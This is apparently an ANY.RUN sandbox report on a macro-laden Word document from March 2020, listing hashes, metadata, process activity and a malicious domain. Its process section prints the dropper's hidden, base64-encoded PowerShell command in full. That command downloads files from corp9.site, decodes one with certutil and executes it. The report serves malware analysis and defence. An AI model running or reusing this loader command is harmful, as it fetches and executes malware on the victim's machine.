analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

e2806612af797169aa35397801d748abc9b9ab8ab210e891ed2091cf53f443cf.doc

Full analysis: https://app.any.run/tasks/0545b646-1137-456b-b107-b1a9fb2a32c7
Verdict: Malicious activity
Analysis date: March 31, 2020, 02:54:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
maldoc-42
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: user, Template: Normal, Last Saved By: Windows User, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 12 14:15:00 2020, Last Saved Time/Date: Thu Mar 12 14:15:00 2020, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

DD69EF312ACEEA158B078A8305EAC0A1

SHA1:

248510ACA04A2F98926A659299EE0E687976E5E9

SHA256:

E2806612AF797169AA35397801D748ABC9B9AB8AB210E891ED2091CF53F443CF

SSDEEP:

3072:3/s1dirz4eeVuDcu/05oO3tmhF5N/PWO:6di/xtScN/PWO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 4068)
    • Executed via WMI

      • powershell.exe (PID: 4068)
    • PowerShell script executed

      • powershell.exe (PID: 4068)
    • Starts CertUtil for decode files

      • powershell.exe (PID: 4068)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3440)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3440)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (38.3)
.xls | Microsoft Excel sheet (alternate) (29.3)
.doc | Microsoft Word document (old ver.) (22.7)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
  • Название
  • 1
TitleOfParts:
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Company: diakov.net
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2020:03:12 14:15:00
CreateDate: 2020:03:12 14:15:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 2
LastModifiedBy: Windows User
Template: Normal
Comments: -
Keywords: -
Author: user
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
3
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe no specs certutil.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3440"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\e2806612af797169aa35397801d748abc9b9ab8ab210e891ed2091cf53f443cf.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4068powershell -windowstyle hidden -e SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIABoAHQAdABwADoALwAvAGMAbwByAHAAOQAuAHMAaQB0AGUALwBLAGUAWQBFAEEALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AYwBvAHIAcAA5AC4AcwBpAHQAZQAvAFQAZQBHAEEALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AYwBvAHIAcAA5AC4AcwBpAHQAZQAvAHMATwBGAHMAWAAuAGQAYQB0ACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYgA3AGsAOQBzAC4AYwBvAG0AIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXABjAHQAcQBkADcAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXABzAE8ARgBzAFgALgBjAG8AbQAiADsAIABTAGUAdAAtAEwAbwBjAGEAdABpAG8AbgAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAGMAdABxAGQANwAgADIAawA1AGoAbgA7ACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAYgA3AGsAOQBzACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgADIAawA1AGoAbgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2272"C:\Windows\system32\certutil.exe" -decode ctqd7 2k5jnC:\Windows\system32\certutil.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147942402
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 799
Read events
1 066
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3440WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6B55.tmp.cvr
MD5:
SHA256:
4068powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CE8DCEOOJAN9UYX024SX.temp
MD5:
SHA256:
4068powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFa6745d.TMPbinary
MD5:3B712DE36DC1672EC51A90C5EE31744F
SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1
3440WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$806612af797169aa35397801d748abc9b9ab8ab210e891ed2091cf53f443cf.docpgc
MD5:C1CA37770F58A829CBFB0A95179CF89F
SHA256:3E3BE7930D72235C573B2F5C371C3C893833349E82D038A5E7D5679CCD7C3E78
4068powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3B712DE36DC1672EC51A90C5EE31744F
SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1
3440WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8705E7D35117CF605EF761D225C1F1E3
SHA256:2741B38EAA68EE329063F9DF6B38F992B6C4BAD6A2490BBE43B6310F28C2FB0C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
corp9.site
malicious

Threats

No threats detected
No debug info